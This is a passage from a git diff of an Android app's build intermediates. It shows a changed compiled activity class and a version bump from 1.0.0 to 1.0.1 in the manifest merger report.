a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity.class index 6e768b17..47756a7a 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity.class differ diff --git a/app/build/intermediates/manifest_merge_blame_file/debug/manifest-merger-blame-debug-report.txt b/app/build/intermediates/manifest_merge_blame_file/debug/manifest-merger-blame-debug-report.txt index bc49f1e7..9abcb2d5 100644 --- a/app/build/intermediates/manifest_merge_blame_file/debug/manifest-merger-blame-debug-report.txt +++ b/app/build/intermediates/manifest_merge_blame_file/debug/manifest-merger-blame-debug-report.txt @@ -7,7 +7,7 @@ 7 android:compileSdkVersionCodename="12" 8 android:installLocation="preferExternal" 9 android:versionCode="1" -10 android:versionName="1.0.0" > +10 android:versionName="1.0.1" > 11 12 + android:versionName="1.0.1" > + android:versionName="1.0.1" > + android:versionName="1.0.1" >